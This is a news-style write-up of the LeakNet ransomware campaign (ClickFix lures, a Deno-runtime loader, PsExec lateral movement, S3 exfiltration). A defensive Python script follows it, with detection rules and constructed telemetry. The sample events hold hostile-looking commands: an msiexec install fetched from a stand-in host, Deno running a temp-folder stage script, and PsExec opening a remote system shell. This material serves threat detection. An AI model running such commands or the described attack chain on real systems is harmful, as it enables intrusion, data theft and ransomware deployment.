
LeakNet Ransomware’s Stealthy New Attack Methods Revealed

Summary

– The LeakNet ransomware gang uses the “ClickFix” social engineering technique to trick users into running malicious commands for initial access.
– It deploys a novel loader based on the legitimate Deno runtime to execute malicious JavaScript payloads directly in system memory, minimizing forensic evidence.
– This “bring your own runtime” (BYOR) tactic helps bypass security filters, as Deno is a signed, legitimate application often used by developers.
– After infection, the malware performs fingerprinting, establishes command-and-control communication, and uses tools like PsExec for lateral movement and data exfiltration.
– Defenders can detect this activity by monitoring for Deno outside development environments, abnormal PsExec usage, or unexpected traffic to services like Amazon S3.

A sophisticated ransomware group known as LeakNet has refined its attack strategy, employing a clever combination of social engineering and legitimate software to infiltrate corporate networks. Security researchers have detailed a new method where the group uses the ClickFix social engineering technique for initial access, followed by a novel malware loader built on the open-source Deno runtime. This approach allows malicious code to run directly in system memory, significantly reducing the digital footprints left on a hard drive and making detection by traditional security tools much more difficult.

The LeakNet operation, which emerged in late 2024, has been linked to approximately three victim organizations per month. Analysts warn that this rate could increase with the adoption of these stealthier tactics. The ClickFix method is not unique to LeakNet; other ransomware gangs such as Termite and Interlock also use it. The technique deceives users into executing harmful commands on their own computers by presenting counterfeit system prompts and dialog boxes (for example, a fake verification or "fix" step that asks the user to paste a command into a Run box or terminal).

In this specific campaign, the ClickFix lure results in the deployment of a loader script that leverages Deno. Deno is a fully legitimate and signed runtime environment for JavaScript and TypeScript, typically used by developers. Because it is a trusted application, it easily bypasses security filters designed to block unknown or suspicious binaries. Security firm ReliaQuest has labeled this a “bring your own runtime” (BYOR) attack, where attackers weaponize a legitimate tool to avoid suspicion.

Instead of creating a custom loader likely to trigger alerts, the threat actors drop the authentic, signed Deno executable and use it to run their malicious scripts. In observed incidents, this process was initiated through cleverly named VBScript and PowerShell scripts, such as `Romeo.ps1` and `Juliet.vbs`. Using Deno for direct in-memory execution is a critical stealth advantage: the activity blends in with normal developer tasks, and because the JavaScript payload never needs to be written to disk as a conventional executable, it leaves minimal forensic evidence behind.

Once activated, the malicious code performs reconnaissance on the infected host, creates a unique identifier for the victim machine, and establishes contact with a remote command-and-control server. It then retrieves a second-stage payload while simultaneously initiating a persistent loop to await further instructions from the attackers.

Following successful infiltration, LeakNet employs a range of post-exploitation techniques to expand its reach within a network. These include DLL sideloading through a Java process, continuous beaconing to command servers, and credential discovery using system enumeration commands. The group moves laterally across the network using tools like PsExec and stages payloads while exfiltrating stolen data, often by misusing cloud storage services such as Amazon S3 buckets.

Despite the sophistication of this attack chain, its consistent and repeatable nature provides opportunities for detection. Defenders are advised to monitor for several strong indicators of a potential LeakNet intrusion. Key warning signs include the Deno runtime executing outside of expected development environments, suspicious `msiexec` commands spawned by web browsers (a browser process as the parent of `msiexec.exe`), and abnormal usage of the PsExec tool. Additionally, unexpected outbound network traffic to Amazon S3 storage and DLL files being loaded from unusual (typically user-writable) directories should be investigated immediately as potential evidence of this stealthy ransomware activity.
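The following is an added example, not code from the original report or from ReliaQuest or Bleeping Computer, showing how the five indicators above can be expressed as simple rules over process-creation, image-load and network-connection telemetry. The event records are constructed inline in Sysmon's field naming (EventID, Computer, Image, ParentImage, CommandLine, ImageLoaded, DestinationHostname) and are not real logs; the host allowlists (`DEV_HOSTS`, `ADMIN_HOSTS`, `S3_HOSTS`), file paths and bucket names are hypothetical placeholders that an environment would tune to its own baseline.

```python
"""Toy detection pass for the LeakNet indicators listed above, run over
constructed Sysmon-style events. Allowlists and sample data are placeholders
for this example, not values from the article."""
import ntpath
import re
from typing import Dict, List, Tuple

# Assumed per-environment allowlists (hypothetical host names).
DEV_HOSTS = {"dev-ws-01"}        # hosts where developers legitimately run Deno
ADMIN_HOSTS = {"admin-jump-01"}  # hosts permitted to launch PsExec
S3_HOSTS = {"backup-srv-01"}     # hosts expected to talk to Amazon S3

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
PSEXEC_NAMES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
# User-writable roots from which a DLL load into a signed host process
# (for example java.exe) is suspicious.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Matches s3.amazonaws.com, bucket.s3.<region>.amazonaws.com and the legacy
# s3-<region>.amazonaws.com forms, but not other AWS endpoints.
S3_RE = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)*\.amazonaws\.com$")

Finding = Tuple[str, str, str]  # (rule, host, evidence)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def parent_dir(path: str) -> str:
    return ntpath.dirname(path).lower() + "\\"


def check_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply each indicator rule to one event and return the matches."""
    host = ev["Computer"].lower()
    findings: List[Finding] = []
    if ev["EventID"] == "1":  # process creation
        img, parent = base(ev["Image"]), base(ev.get("ParentImage", ""))
        if img == "deno.exe" and host not in DEV_HOSTS:
            findings.append(("deno_outside_dev", host, ev["CommandLine"]))
        if img == "msiexec.exe" and parent in BROWSERS:
            findings.append(("msiexec_from_browser", host, ev["CommandLine"]))
        if img in PSEXEC_NAMES and host not in ADMIN_HOSTS:
            findings.append(("psexec_unexpected_host", host, ev["CommandLine"]))
    elif ev["EventID"] == "7":  # image (DLL) load
        loaded = ev["ImageLoaded"]
        if loaded.lower().endswith(".dll") and parent_dir(loaded).startswith(USER_WRITABLE):
            findings.append(("dll_from_user_writable_dir", host,
                             f"{base(ev['Image'])} loaded {loaded}"))
    elif ev["EventID"] == "3":  # network connection
        dest = ev.get("DestinationHostname", "").lower()
        if S3_RE.search(dest) and host not in S3_HOSTS:
            findings.append(("unexpected_s3_traffic", host, f"{base(ev['Image'])} -> {dest}"))
    return findings


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every rule over every event, preserving event order."""
    return [f for ev in events for f in check_event(ev)]


# Constructed sample telemetry: one benign and one suspicious case per rule.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # benign: a developer running Deno from an editor on an allowlisted host
    {"EventID": "1", "Computer": "dev-ws-01", "Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "deno test"},
    # ClickFix-style chain: browser spawns msiexec, then PowerShell runs Deno from Temp
    {"EventID": "1", "Computer": "HR-WS-07", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "msiexec /i https://example.invalid/update.msi /qn"},
    {"EventID": "1", "Computer": "HR-WS-07", "Image": r"C:\Users\alice\AppData\Local\Temp\deno.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "deno.exe run -A C:\\Users\\alice\\AppData\\Local\\Temp\\stage1.js"},
    # lateral-movement tooling launched from a non-admin workstation
    {"EventID": "1", "Computer": "HR-WS-07", "Image": r"C:\Users\alice\Downloads\PsExec64.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"PsExec64.exe \\FS-01 -s cmd"},
    # DLL loads: benign from Program Files, suspicious from the user profile
    {"EventID": "7", "Computer": "HR-WS-07", "Image": r"C:\Program Files\Java\bin\java.exe",
     "ImageLoaded": r"C:\Program Files\Java\bin\jli.dll"},
    {"EventID": "7", "Computer": "HR-WS-07", "Image": r"C:\Users\alice\AppData\Roaming\jre\java.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\jre\jli.dll"},
    # S3 traffic: expected from the backup server, not from a workstation's Deno
    {"EventID": "3", "Computer": "backup-srv-01", "Image": r"C:\Program Files\Backup\agent.exe",
     "DestinationHostname": "s3.amazonaws.com"},
    {"EventID": "3", "Computer": "HR-WS-07", "Image": r"C:\Users\alice\AppData\Local\Temp\deno.exe",
     "DestinationHostname": "exfil-bucket.s3.us-east-1.amazonaws.com"},
]

if __name__ == "__main__":
    for rule, host, evidence in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {evidence}")
```

Run stand-alone, the script reports five findings, all on the workstation `hr-ws-07`, and nothing for the allowlisted developer machine or backup server. The value of the rules comes from the baseline behind them: Deno on a developer's box and PsExec from a jump host are normal, so each rule is an allowlist plus a behaviour, not a bare filename match, and the DLL rule keys on a user-writable load path rather than on Java specifically so it also catches the same sideload staged under a different signed host process.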

(Source: Bleeping Computer)
